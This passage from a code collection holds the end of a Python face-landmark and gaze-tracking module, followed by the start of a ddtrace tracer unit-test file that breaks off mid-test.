[-0.181481567104525, -0.243239316141725, -0.231284988892766],
[-0.074036069749345, -0.250689938345682, -0.177346470406188],
[ 0. , -0.264945854681568, -0.112349967428413],
[ 0.074036069749345, -0.250689938345682, -0.177346470406188],
# Pupils and eyeball centers
[ 0.257990002632141, 0.276080012321472, -0.219998998939991],
[-0.257990002632141, 0.276080012321472, -0.219998998939991],
[ 0.257990002632141, 0.276080012321472, -0.324570998549461],
[-0.257990002632141, 0.276080012321472, -0.324570998549461]
], np.float32)
self.camera = np.array([[width, 0, width/2], [0, width, height/2], [0, 0, 1]], np.float32)
self.inverse_camera = np.linalg.inv(self.camera)
self.dist_coeffs = np.zeros((4,1))
self.frame_count = 0
self.width = width
self.height = height
self.threshold = threshold
self.detection_threshold = detection_threshold
self.max_faces = max_faces
self.max_threads = max_threads
self.discard = 0
self.discard_after = discard_after
self.detected = 0
self.wait_count = 0
self.scan_every = scan_every
self.bbox_growth = bbox_growth
self.silent = silent
self.try_hard = try_hard
self.res = 224.
self.mean_res = self.mean_224
self.std_res = self.std_224
if model_type < 0:
self.res = 56.
self.mean_res = np.tile(self.mean, [56, 56, 1])
self.std_res = np.tile(self.std, [56, 56, 1])
if model_type < -1:
self.res = 112.
self.mean_res = np.tile(self.mean, [112, 112, 1])
self.std_res = np.tile(self.std, [112, 112, 1])
self.res_i = int(self.res)
self.out_res = 27.
if model_type < 0:
self.out_res = 6.
if model_type < -1:
self.out_res = 13.
self.out_res_i = int(self.out_res) + 1
self.logit_factor = 16.
if model_type < 0:
self.logit_factor = 8.
if model_type < -1:
self.logit_factor = 16.
self.no_gaze = no_gaze
self.debug_gaze = False
self.feature_level = feature_level
if model_type == -1:
self.feature_level = min(feature_level, 1)
self.max_feature_updates = max_feature_updates
self.static_model = static_model
self.face_info = [FaceInfo(id, self) for id in range(max_faces)]
self.fail_count = 0
def detect_faces(self, frame):
im = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_LINEAR)[:,:,::-1] * self.std_224 + self.mean_224
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
outputs, maxpool = self.detection.run([], {'input': im})
outputs = np.array(outputs)
maxpool = np.array(maxpool)
outputs[0, 0, outputs[0, 0] != maxpool[0, 0]] = 0
detections = np.flip(np.argsort(outputs[0,0].flatten()))
results = []
for det in detections[0:self.max_faces]:
y, x = det // 56, det % 56
c = outputs[0, 0, y, x]
r = outputs[0, 1, y, x] * 112.
x *= 4
y *= 4
r *= 1.0
if c < self.detection_threshold:
break
results.append((x - r, y - r, 2 * r, 2 * r * 1.0))
results = np.array(results).astype(np.float32)
if results.shape[0] > 0:
results[:, [0,2]] *= frame.shape[1] / 224.
results[:, [1,3]] *= frame.shape[0] / 224.
return results
def landmarks(self, tensor, crop_info):
crop_x1, crop_y1, scale_x, scale_y, _ = crop_info
avg_conf = 0
res = self.res - 1
c0, c1, c2 = 66, 132, 198
if self.model_type == -1:
c0, c1, c2 = 30, 60, 90
t_main = tensor[0:c0].reshape((c0,self.out_res_i * self.out_res_i))
t_m = t_main.argmax(1)
indices = np.expand_dims(t_m, 1)
t_conf = np.take_along_axis(t_main, indices, 1).reshape((c0,))
t_off_x = np.take_along_axis(tensor[c0:c1].reshape((c0,self.out_res_i * self.out_res_i)), indices, 1).reshape((c0,))
t_off_y = np.take_along_axis(tensor[c1:c2].reshape((c0,self.out_res_i * self.out_res_i)), indices, 1).reshape((c0,))
t_off_x = res * logit_arr(t_off_x, self.logit_factor)
t_off_y = res * logit_arr(t_off_y, self.logit_factor)
t_x = crop_y1 + scale_y * (res * np.floor(t_m / self.out_res_i) / self.out_res + t_off_x)
t_y = crop_x1 + scale_x * (res * np.floor(np.mod(t_m, self.out_res_i)) / self.out_res + t_off_y)
avg_conf = np.average(t_conf)
lms = np.stack([t_x, t_y, t_conf], 1)
lms[np.isnan(lms).any(axis=1)] = np.array([0.,0.,0.], dtype=np.float32)
if self.model_type == -1:
lms = lms[[0,0,1,1,1,2,2,2,3,3,3,4,4,4,5,5,6,7,7,8,8,9,10,10,11,11,12,21,21,21,22,23,23,23,23,23,13,14,14,15,16,16,17,18,18,19,20,20,24,25,25,25,26,26,27,27,27,24,24,28,28,28,26,29,29,29]]
#lms[[1,3,4,6,7,9,10,12,13,15,18,20,23,25,38,40,44,46]] += lms[[2,2,5,5,8,8,11,11,14,16,19,21,24,26,39,39,45,45]]
#lms[[3,4,6,7,9,10,12,13]] += lms[[5,5,8,8,11,11,14,14]]
#lms[[1,15,18,20,23,25,38,40,44,46]] /= 2.0
#lms[[3,4,6,7,9,10,12,13]] /= 3.0
part_avg = np.mean(np.partition(lms[:,2],3)[0:3])
if part_avg < 0.65:
avg_conf = part_avg
return (avg_conf, np.array(lms))
def estimate_depth(self, face_info):
lms = np.concatenate((face_info.lms, np.array([[face_info.eye_state[0][1], face_info.eye_state[0][2], face_info.eye_state[0][3]], [face_info.eye_state[1][1], face_info.eye_state[1][2], face_info.eye_state[1][3]]], np.float)), 0)
image_pts = np.array(lms)[face_info.contour_pts, 0:2]
success = False
if not face_info.rotation is None:
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=np.transpose(face_info.rotation), tvec=np.transpose(face_info.translation), flags=cv2.SOLVEPNP_ITERATIVE)
else:
rvec = np.array([0, 0, 0], np.float32)
tvec = np.array([0, 0, 0], np.float32)
success, face_info.rotation, face_info.translation = cv2.solvePnP(face_info.contour, image_pts, self.camera, self.dist_coeffs, useExtrinsicGuess=True, rvec=rvec, tvec=tvec, flags=cv2.SOLVEPNP_ITERATIVE)
rotation = face_info.rotation
translation = face_info.translation
pts_3d = np.zeros((70,3), np.float32)
if not success:
face_info.rotation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
return False, np.zeros(4), np.zeros(3), 99999., pts_3d, lms
else:
face_info.rotation = np.transpose(face_info.rotation)
face_info.translation = np.transpose(face_info.translation)
rmat, _ = cv2.Rodrigues(rotation)
inverse_rotation = np.linalg.inv(rmat)
t_reference = face_info.face_3d.dot(rmat.transpose())
t_reference = t_reference + face_info.translation
t_reference = t_reference.dot(self.camera.transpose())
t_depth = t_reference[:, 2]
t_depth[t_depth == 0] = 0.000001
t_depth_e = np.expand_dims(t_depth[:],1)
t_reference = t_reference[:] / t_depth_e
pts_3d[0:66] = np.stack([lms[0:66,0], lms[0:66,1], np.ones((66,))], 1) * t_depth_e[0:66]
pts_3d[0:66] = (pts_3d[0:66].dot(self.inverse_camera.transpose()) - face_info.translation).dot(inverse_rotation.transpose())
pnp_error = np.power(lms[0:17,0:2] - t_reference[0:17,0:2], 2).sum()
pnp_error += np.power(lms[30,0:2] - t_reference[30,0:2], 2).sum()
if np.isnan(pnp_error):
pnp_error = 9999999.
for i, pt in enumerate(face_info.face_3d[66:70]):
if i == 2:
# Right eyeball
# Eyeballs have an average diameter of 12.5mm and and the distance between eye corners is 30-35mm, so a conversion factor of 0.385 can be applied
eye_center = (pts_3d[36] + pts_3d[39]) / 2.0
d_corner = np.linalg.norm(pts_3d[36] - pts_3d[39])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[68] = pt_3d
continue
if i == 3:
# Left eyeball
eye_center = (pts_3d[42] + pts_3d[45]) / 2.0
d_corner = np.linalg.norm(pts_3d[42] - pts_3d[45])
depth = 0.385 * d_corner
pt_3d = np.array([eye_center[0], eye_center[1], eye_center[2] - depth])
pts_3d[69] = pt_3d
continue
if i == 0:
d1 = np.linalg.norm(lms[66,0:2] - lms[36,0:2])
d2 = np.linalg.norm(lms[66,0:2] - lms[39,0:2])
d = d1 + d2
pt = (pts_3d[36] * d1 + pts_3d[39] * d2) / d
if i == 1:
d1 = np.linalg.norm(lms[67,0:2] - lms[42,0:2])
d2 = np.linalg.norm(lms[67,0:2] - lms[45,0:2])
d = d1 + d2
pt = (pts_3d[42] * d1 + pts_3d[45] * d2) / d
if i < 2:
reference = rmat.dot(pt)
reference = reference + face_info.translation
reference = self.camera.dot(reference)
depth = reference[2]
pt_3d = np.array([lms[66+i][0] * depth, lms[66+i][1] * depth, depth], np.float32)
pt_3d = self.inverse_camera.dot(pt_3d)
pt_3d = pt_3d - face_info.translation
pt_3d = inverse_rotation.dot(pt_3d)
pts_3d[66+i,:] = pt_3d[:]
pts_3d[np.isnan(pts_3d).any(axis=1)] = np.array([0.,0.,0.], dtype=np.float32)
pnp_error = np.sqrt(pnp_error / (2.0 * image_pts.shape[0]))
if pnp_error > 300:
face_info.fail_count += 1
if face_info.fail_count > 5:
# Something went wrong with adjusting the 3D model
if not self.silent:
print(f"Detected anomaly when 3D fitting face {face_info.id}. Resetting.")
face_info.face_3d = copy.copy(self.face_3d)
face_info.rotation = None
face_info.translation = np.array([0.0, 0.0, 0.0], np.float32)
face_info.update_counts = np.zeros((66,2))
face_info.update_contour()
else:
face_info.fail_count = 0
euler = cv2.RQDecomp3x3(rmat)[0]
return True, matrix_to_quaternion(rmat), euler, pnp_error, pts_3d, lms
def preprocess(self, im, crop):
x1, y1, x2, y2 = crop
im = np.float32(im[y1:y2, x1:x2,::-1]) # Crop and BGR to RGB
im = cv2.resize(im, (self.res_i, self.res_i), interpolation=cv2.INTER_LINEAR) * self.std_res + self.mean_res
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,1,2))
return im
def equalize(self, im):
im_yuv = cv2.cvtColor(im, cv2.COLOR_BGR2YUV)
im_yuv[:,:,0] = cv2.equalizeHist(im_yuv[:,:,0])
return cv2.cvtColor(im_yuv, cv2.COLOR_YUV2BGR)
def corners_to_eye(self, corners, w, h, flip):
((cx1, cy1), (cx2, cy2)) = corners
c1 = np.array([cx1, cy1])
c2 = np.array([cx2, cy2])
c2, a = compensate(c1, c2)
center = (c1 + c2) / 2.0
radius = np.linalg.norm(c1 - c2) / 2.0
radius = np.array([radius * 1.4, radius * 1.2])
upper_left = clamp_to_im(center - radius, w, h)
lower_right = clamp_to_im(center + radius, w, h)
return upper_left, lower_right, center, radius, c1, a
def prepare_eye(self, frame, full_frame, lms, flip):
outer_pt = tuple(lms[0])
inner_pt = tuple(lms[1])
h, w, _ = frame.shape
(x1, y1), (x2, y2), center, radius, reference, a = self.corners_to_eye((outer_pt, inner_pt), w, h, flip)
im = rotate_image(frame[:, :, ::], a, reference)
im = im[int(y1):int(y2), int(x1):int(x2),:]
if np.prod(im.shape) < 1:
return None, None, None, None, None, None
if flip:
im = cv2.flip(im, 1)
scale = np.array([(x2 - x1), (y2 - y1)]) / 32.
im = cv2.resize(im, (32, 32), interpolation=cv2.INTER_LINEAR)
#im = self.equalize(im)
if self.debug_gaze:
if not flip:
full_frame[0:32, 0:32] = im
else:
full_frame[0:32, 32:64] = im
im = im.astype(np.float32)[:,:,::-1] * self.std_32 + self.mean_32
im = np.expand_dims(im, 0)
im = np.transpose(im, (0,3,2,1))
return im, x1, y1, scale, reference, a
def extract_face(self, frame, lms):
lms = np.array(lms)[:,0:2][:,::-1]
x1, y1 = tuple(lms.min(0))
x2, y2 = tuple(lms.max(0))
radius_x = 1.2 * (x2 - x1) / 2.0
radius_y = 1.2 * (y2 - y1) / 2.0
radius = np.array((radius_x, radius_y))
center = (np.array((x1, y1)) + np.array((x2, y2))) / 2.0
w, h, _ = frame.shape
x1, y1 = clamp_to_im(center - radius, h, w)
x2, y2 = clamp_to_im(center + radius + 1, h, w)
offset = np.array((x1, y1))
lms = (lms[:, 0:2] - offset).astype(np.int)
frame = frame[y1:y2, x1:x2]
return frame, lms, offset
def get_eye_state(self, frame, lms):
if self.no_gaze:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
lms = np.array(lms)
e_x = [0,0]
e_y = [0,0]
scale = [0,0]
reference = [None, None]
angles = [0, 0]
face_frame, lms, offset = self.extract_face(frame, lms)
(right_eye, e_x[0], e_y[0], scale[0], reference[0], angles[0]) = self.prepare_eye(face_frame, frame, np.array([lms[36,0:2], lms[39,0:2]]), False)
(left_eye, e_x[1], e_y[1], scale[1], reference[1], angles[1]) = self.prepare_eye(face_frame, frame, np.array([lms[42,0:2], lms[45,0:2]]), True)
if right_eye is None or left_eye is None:
return [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
both_eyes = np.concatenate((right_eye, left_eye))
results = None
results = self.gaze_model.run([], {self.input_name: both_eyes})
open = [0, 0]
open[0] = 1#results[1][0].argmax()
open[1] = 1#results[1][1].argmax()
results = np.array(results[0])
eye_state = []
for i in range(2):
m = int(results[i][0].argmax())
x = m // 8
y = m % 8
conf = float(results[i][0][x,y])
off_x = 32.0 * logit(results[i][1][x, y], 8.0)
off_y = 32.0 * logit(results[i][2][x, y], 8.0)
if i == 1:
eye_x = 32.0 * float(x) / 8.0 + off_x
else:
eye_x = 32.0 * float(x) / 8.0 + off_x
eye_y = 32.0 * float(y) / 8.0 + off_y
if self.debug_gaze:
if i == 0:
frame[int(eye_y), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), int(eye_x+1)] = (0, 0, 255)
else:
frame[int(eye_y), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x)] = (0, 0, 255)
frame[int(eye_y+1), 32+int(eye_x+1)] = (0, 0, 255)
frame[int(eye_y), 32+int(eye_x+1)] = (0, 0, 255)
if i == 0:
eye_x = e_x[i] + scale[i][0] * eye_x
else:
eye_x = e_x[i] + scale[i][0] * (32. - eye_x)
eye_y = e_y[i] + scale[i][1] * eye_y
eye_x, eye_y = rotate(reference[i], (eye_x, eye_y), -angles[i])
eye_x = eye_x + offset[0]
eye_y = eye_y + offset[1]
eye_state.append([open[i], eye_y, eye_x, conf])
eye_state = np.array(eye_state)
eye_state[np.isnan(eye_state).any(axis=1)] = np.array([1.,0.,0.,0.], dtype=np.float32)
return eye_state
def assign_face_info(self, results):
if self.max_faces == 1 and len(results) == 1:
conf, (lms, eye_state), conf_adjust = results[0]
self.face_info[0].update((conf - conf_adjust, (lms, eye_state)), np.array(lms)[:, 0:2].mean(0), self.frame_count)
return
result_coords = []
adjusted_results = []
for conf, (lms, eye_state), conf_adjust in results:
adjusted_results.append((conf - conf_adjust, (lms, eye_state)))
result_coords.append(np.array(lms)[:, 0:2].mean(0))
results = adjusted_results
candidates = [[]] * self.max_faces
max_dist = 2 * np.linalg.norm(np.array([self.width, self.height]))
for i, face_info in enumerate(self.face_info):
for j, coord in enumerate(result_coords):
if face_info.coord is None:
candidates[i].append((max_dist, i, j))
else:
candidates[i].append((np.linalg.norm(face_info.coord - coord), i, j))
for i, candidate in enumerate(candidates):
candidates[i] = sorted(candidate)
found = 0
target = len(results)
used_results = {}
used_faces = {}
while found < target:
min_list = min(candidates)
candidate = min_list.pop(0)
face_idx = candidate[1]
result_idx = candidate[2]
if not result_idx in used_results and not face_idx in used_faces:
self.face_info[face_idx].update(results[result_idx], result_coords[result_idx], self.frame_count)
min_list.clear()
used_results[result_idx] = True
used_faces[face_idx] = True
found += 1
if len(min_list) == 0:
min_list.append((2 * max_dist, face_idx, result_idx))
for face_info in self.face_info:
if face_info.frame_count != self.frame_count:
face_info.update(None, None, self.frame_count)
def predict(self, frame, additional_faces=[]):
self.frame_count += 1
start = time.perf_counter()
im = frame
duration_fd = 0.0
duration_pp = 0.0
duration_model = 0.0
duration_pnp = 0.0
new_faces = []
new_faces.extend(self.faces)
bonus_cutoff = len(self.faces)
new_faces.extend(additional_faces)
self.wait_count += 1
if self.detected == 0:
start_fd = time.perf_counter()
if self.use_retinaface > 0 or self.try_hard:
retinaface_detections = self.retinaface.detect_retina(frame)
new_faces.extend(retinaface_detections)
if self.use_retinaface == 0 or self.try_hard:
new_faces.extend(self.detect_faces(frame))
if self.try_hard:
new_faces.extend([(0, 0, self.width, self.height)])
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
elif self.detected < self.max_faces:
if self.use_retinaface > 0:
new_faces.extend(self.retinaface_scan.get_results())
if self.wait_count >= self.scan_every:
if self.use_retinaface > 0:
self.retinaface_scan.background_detect(frame)
else:
start_fd = time.perf_counter()
new_faces.extend(self.detect_faces(frame))
duration_fd = 1000 * (time.perf_counter() - start_fd)
self.wait_count = 0
else:
self.wait_count = 0
if len(new_faces) < 1:
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms")
return []
crops = []
crop_info = []
num_crops = 0
for j, (x,y,w,h) in enumerate(new_faces):
crop_x1 = x - int(w * 0.1)
crop_y1 = y - int(h * 0.125)
crop_x2 = x + w + int(w * 0.1)
crop_y2 = y + h + int(h * 0.125)
crop_x1, crop_y1 = clamp_to_im((crop_x1, crop_y1), self.width, self.height)
crop_x2, crop_y2 = clamp_to_im((crop_x2, crop_y2), self.width, self.height)
scale_x = float(crop_x2 - crop_x1) / self.res
scale_y = float(crop_y2 - crop_y1) / self.res
if crop_x2 - crop_x1 < 4 or crop_y2 - crop_y1 < 4:
continue
start_pp = time.perf_counter()
crop = self.preprocess(im, (crop_x1, crop_y1, crop_x2, crop_y2))
duration_pp += 1000 * (time.perf_counter() - start_pp)
crops.append(crop)
crop_info.append((crop_x1, crop_y1, scale_x, scale_y, 0.0 if j >= bonus_cutoff else 0.1))
num_crops += 1
start_model = time.perf_counter()
outputs = {}
if num_crops == 1:
output = self.session.run([], {self.input_name: crops[0]})[0]
conf, lms = self.landmarks(output[0], crop_info[0])
if conf > self.threshold:
try:
eye_state = self.get_eye_state(frame, lms)
except:
eye_state = [(1.0, 0.0, 0.0, 0.0), (1.0, 0.0, 0.0, 0.0)]
outputs[crop_info[0]] = (conf, (lms, eye_state), 0)
else:
started = 0
results = queue.Queue()
for i in range(min(num_crops, self.max_workers)):
thread = threading.Thread(target=worker_thread, args=(self.sessions[started], frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
returned = 0
while returned < num_crops:
result = results.get(True)
if len(result) != 1:
session, conf, lms, sample_crop_info, idx = result
outputs[sample_crop_info] = (conf, lms, idx)
else:
session = result[0]
returned += 1
if started < num_crops:
thread = threading.Thread(target=worker_thread, args=(session, frame, crops[started], crop_info[started], results, self.input_name, started, self))
started += 1
thread.start()
actual_faces = []
good_crops = []
for crop in crop_info:
if crop not in outputs:
continue
conf, lms, i = outputs[crop]
x1, y1, _ = lms[0].min(0)
x2, y2, _ = lms[0].max(0)
bb = (x1, y1, x2 - x1, y2 - y1)
outputs[crop] = (conf, lms, i, bb)
actual_faces.append(bb)
good_crops.append(crop)
groups = group_rects(actual_faces)
best_results = {}
for crop in good_crops:
conf, lms, i, bb = outputs[crop]
if conf < self.threshold:
continue;
group_id = groups[str(bb)][0]
if not group_id in best_results:
best_results[group_id] = [-1, [], 0]
if conf > self.threshold and best_results[group_id][0] < conf + crop[4]:
best_results[group_id][0] = conf + crop[4]
best_results[group_id][1] = lms
best_results[group_id][2] = crop[4]
sorted_results = sorted(best_results.values(), key=lambda x: x[0], reverse=True)[:self.max_faces]
self.assign_face_info(sorted_results)
duration_model = 1000 * (time.perf_counter() - start_model)
results = []
detected = []
start_pnp = time.perf_counter()
for face_info in self.face_info:
if face_info.alive and face_info.conf > self.threshold:
face_info.success, face_info.quaternion, face_info.euler, face_info.pnp_error, face_info.pts_3d, face_info.lms = self.estimate_depth(face_info)
face_info.adjust_3d()
lms = face_info.lms[:, 0:2]
x1, y1 = tuple(lms[0:66].min(0))
x2, y2 = tuple(lms[0:66].max(0))
bbox = (y1, x1, y2 - y1, x2 - x1)
face_info.bbox = bbox
detected.append(bbox)
results.append(face_info)
duration_pnp += 1000 * (time.perf_counter() - start_pnp)
if len(detected) > 0:
self.detected = len(detected)
self.faces = detected
self.discard = 0
else:
self.detected = 0
self.discard += 1
if self.discard > self.discard_after:
self.faces = []
else:
if self.bbox_growth > 0:
faces = []
for (x,y,w,h) in self.faces:
x -= w * self.bbox_growth
y -= h * self.bbox_growth
w += 2 * w * self.bbox_growth
h += 2 * h * self.bbox_growth
faces.append((x,y,w,h))
self.faces = faces
self.faces = [x for x in self.faces if not np.isnan(np.array(x)).any()]
self.detected = len(self.faces)
duration = (time.perf_counter() - start) * 1000
if not self.silent:
print(f"Took {duration:.2f}ms (detect: {duration_fd:.2f}ms, crop: {duration_pp:.2f}ms, track: {duration_model:.2f}ms, 3D points: {duration_pnp:.2f}ms)")
results = sorted(results, key=lambda x: x.id)
return results
|
test_tracer.py
|
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import warnings
import mock
import pytest
import six
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.tracer import _has_aws_lambda_agent_extension
from ddtrace.tracer import _in_aws_lambda
from tests.subprocesstest import run_in_subprocess
from tests.utils import TracerTestCase
from tests.utils import override_global_config
from ..utils import override_env
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.current_trace_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
ctx = self.tracer.context_provider.active()
assert ctx is None
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.tracer.start_span("web.request")
assert span.name == "web.request"
assert span.parent_id is None
span.finish()
spans = self.pop_spans()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
